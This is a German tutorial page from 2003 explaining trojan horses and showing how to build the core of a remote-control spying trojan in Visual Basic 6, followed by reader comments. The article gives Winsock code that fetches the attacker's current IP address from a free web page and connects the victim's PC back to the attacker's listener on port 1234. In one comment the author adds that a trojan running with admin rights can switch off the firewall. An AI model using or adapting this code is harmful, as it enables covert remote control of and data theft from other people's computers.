IT-Academy Logo
Sign Up Login Help
Home - Internet - Das Trojanische Pferd



Das Trojanische Pferd

Was ist ein Trojanisches Pferd und wie lässt sich die Grundfunktion in Visual Basic 6 umsetzen?


Autor: P N (notzomedia)
Datum: 11-12-2003, 22:48:46
Referenzen: keine
Schwierigkeit: Fortgeschrittene
Ansichten: 11793x
Rating: 7.67 (3x bewertet)

Hinweis:

Für den hier dargestellte Inhalt ist nicht der Betreiber der Plattform, sondern der jeweilige Autor verantwortlich.
Falls Sie Missbrauch vermuten, bitten wir Sie, uns unter missbrauch@it-academy.cc zu kontaktieren.

[Druckansicht] [Als E-Mail senden] [Kommentar verfassen]



Das Trojanische Pferd

Der Name "Trojanisches Pferd" oder kurz "Trojaner" kommt von einer griechischen Sage:
Im Trojanischen Krieg eroberten die Griechen die Stadt Troja mit Hilfe eines hölzernen Pferdes, in dessen hohlem Bauch 30 Soldaten versteckt waren. Die Soldaten konnten Troja ganz einfach "von innen" her erobern.

Der Computer-Trojaner arbeitet ähnlich:
Das schädliche Programm wird in einen fremden PC eingeschleust, oftmals angehängt an nützliche Software.

Es gibt verschiedene Sorten von Trojanern, manche richten einfach nur Schaden an wie z.B. Viren, andere benutzen Ihren PC als Waffe z.B. bei einem DoS-Angriff gegen Server (Denial of Service, es werden viele Anfragen gleichzeitig an einen Server geschickt, dieser kann die riesige Datenflut nicht verarbeiten und bricht zusammen).

In diesem Artikel möchte ich mich mit Spionage-Fernsteuer-Trojanern befassen, d.h. der Trojaner, einmal auf Ihrem Computer installiert wird vom Hacker gesteuert und kann z.B. Dateien an ihn übertragen.

Will man von einem normalen, privaten Internetanschluss aus einen anderen PC mit normalem, privatem Internetanschluss angreifen (normaler Internetanschluss: Einwahl mit Modem, ISDN oder DSL, keine Standleitung!) ergibt sich folgendes Problem:




Das Internet ist ein riesiges Netzwerk mit sehr vielen Computern, jeder Computer hat eine IP-Adresse, bei einem normalen, privaten Internetanschluss wird diese IP-Adresse bei jeder Einwahl neu vergeben.

Wie finden Sie nun den PC, den Sie angreifen wollen?




Der Trojaner auf dem Opfer-PC fragt eine Internet-Seite von einem Server ab, auf diese Seite wurde vorher die aktuelle IP-Adresse des Angreifers geschrieben. Der Trojaner liest die Adresse und baut eine Verbindung auf.

Wie lässt sich so ein Trojaner mit MS Visual Basic 6 verwirklichen?

Starten Sie ein neues Projekt und klicken Sie auf das Menü Projekt, Komponenten. Fügen Sie das Steuerelement "Microsoft Winsock Control 6.0" (mswinsck.ocx) hinzu.

If WinsockIP.State <> sckClosed Then WinsockIP.Close
WinsockIP.RemoteHost = "fortunecity.de"
WinsockIP.RemotePort = 80
WinsockIP.Connect

In der ersten Zeile werden alle Verbindungen von diesem Winsock Steuerelement geschlossen, falls welche bestehen.
Anschließend wird der Server bestimmt, hier "fortunecity.de" (dort gibt es kostenlosen Webspace)
Es wird noch der Port auf Server-Seite festgelegt (Port 80 = Standard HTTP-Port, HyperTextTransferProtocol), dann wird versucht eine Verbindung aufzubauen.
Schreiben Sie diesen Code in einen Timer und lassen Sie ihn vielleicht einmal pro Minute ausführen, falls der Benutzer des PC noch keine Internetverbindung aufgebaut hat, passiert nämlich nichts.

Private Sub WinsockIP_Connect()
Dim Cmd$, URL$
URL = "http://members.fortunecity.de/user_name/ip.html";
Cmd = "GET " & URL & " HTTP/1.0" & vbCrLf & "Accept: */*" & _
vbCrLf & "Accept: text/html" & vbCrLf & vbCrLf
WinsockIP.SendData Cmd
End Sub

Diese Prozedur wird ausgeführt, wenn eine Verbindung hergestellt wurde. Es werden zuerst zwei Variablen eingeführt, URL ist die anzufordernde HTML-Seite, Cmd ist das gesamte Kommando, welches an den Server geschickt wird.
Zum Schluss wird das fertig zusammen gesetzte Kommando an den Server gesendet.

Private Sub WinsockIP_DataArrival(ByVal bytesTotal As Long)
Dim data$
WinsockIP.GetData data, vbString
ipText = ipText & data
End Sub

Wenn der Server Daten sendet, werden diese von dieser Prozedur in die Variable ipText geschrieben (die Variable ipText muss vorher ausserhalb von Prozeduren deklariert werden!).

Private Sub WinsockIP_Close()
Dim IP as String
IP = Mid(ipText, InStr(1, ipText, "IP-Nummer:") + Len("IP-Nummer:"), 15)

Do While Right(IP, 1) = "."
IP = Left(IP, Len(IP) - 1)
Loop

If WinsockHack.State <> sckClosed Then WinsockHack.Close
WinsockHack.RemoteHost = IP
WinsockHack.RemotePort = 1234
WinsockHack.Connect

End Sub

Sobald die Übertragung der Seite abgeschlossen ist wird die Verbindung vom Server getrennt und diese Prozedur aufgerufen.
Zuerst wird die Seite nach "IP-Nummer:" durchsucht, danach werden 15 Zeichen nach "IP-Nummer:" extrahiert. (15 Zeichen = 4 * 3 Ziffern + 3 Punkte)
Da die IP-Adresse auch kürzer als 15 Zeichen sein kann, z. B. 127.0.0.1 habe ich in der HTML-Seite genügend Punkte angehängt, d.h. die Variable IP enthält jetzt z. B. "127.0.0.1......"
Als nächstes werden alle angehängten Punkte abgeschnitten, so dass "IP" nur noch die korrekte IP-Adresse enthält.
Zum Schluss baut WinsockHack eine Verbindung zur gerade gelesenen IP-Adresse zum Port 1234 auf (auf dem Angreifer-PC sollte das passende Fernsteuerprogramm laufen, welches den Port 1234 geöffnet hat und damit auf Verbindungen wartet.

Disclaimer

Zu beachten ist, dass durch Verwendung der hier gebotenen Informationen strafrechtliche Folgen entstehen können. Der Autor übernmmt keinerlei Haftung für die Verwendung und deren Folgen, der hier dargebotenen Informationen.


notzomedia
Senior Member
Beitrag vom:
11-12-2005, 14:22:48

firewall abschalten..?

also wenn auf einem pc ein programm mit hohen privilegien läuft - weil die meisten user immer noch als admin laufen - dann kann das programm den pc einfach übernehmen.. eine firewall zu deaktivieren ist dann kein problem mehr!

-----------------------------------------------------


Gamma
Rookie
Beitrag vom:
11-12-2005, 12:17:03

hi
also so ein trojaner der bringt doch nur was wenn der benutzer keine firewall installiert hat
also von daher denke ich das so ein kleines howto nicht sehr gefählich werden kann

-----------------------------------------------------
die starken leben von den schwachen


notzomedia
Senior Member
Beitrag vom:
26-12-2003, 13:38:49

ein trojanisches pferd?

ab wann gilt ein programm als trojanisches pferd? wenn es ungefragt private daten an fremde personen/computer verschickt?
also bei mir sendet windows auch ständig ungefragt alles mögliche irgendwo hin, vielleicht sind auch private daten dabei..

das hier vorgestellte programm baut lediglich eine verbindung zwischen zwei privaten computern auf.. diese kann auch z. b. als chat verwendet werden.. oder eben als trojanisches pferd..

-----------------------------------------------------


dreamer
Expert
Beitrag vom:
26-12-2003, 13:09:50

Ist es eigentlich nicht illegal um solche Informationen zu verbreiten? Ich war selbst schon mal das Opfer eines trojanischen Pferdes, und ich jeder nur empfiehlen sich gut zu schützen!

-----------------------------------------------------


[back to top]



Userdaten
User nicht eingeloggt

Gesamtranking
Werbung
Datenbankstand
Autoren:04502
Artikel:00815
Glossar:04116
News:13565
Userbeiträge:16551
Queueeinträge:06233
News Umfrage
Ihre Anforderungen an ein Online-Zeiterfassungs-Produkt?
Mobile Nutzung möglich (Ipone, Android)
Externe API Schnittstelle/Plugins dritter
Zeiterfassung meiner Mitarbeiter
Exportieren in CSV/XLS
Siehe Kommentar



[Results] | [Archiv] Votes: 1131
Comments: 0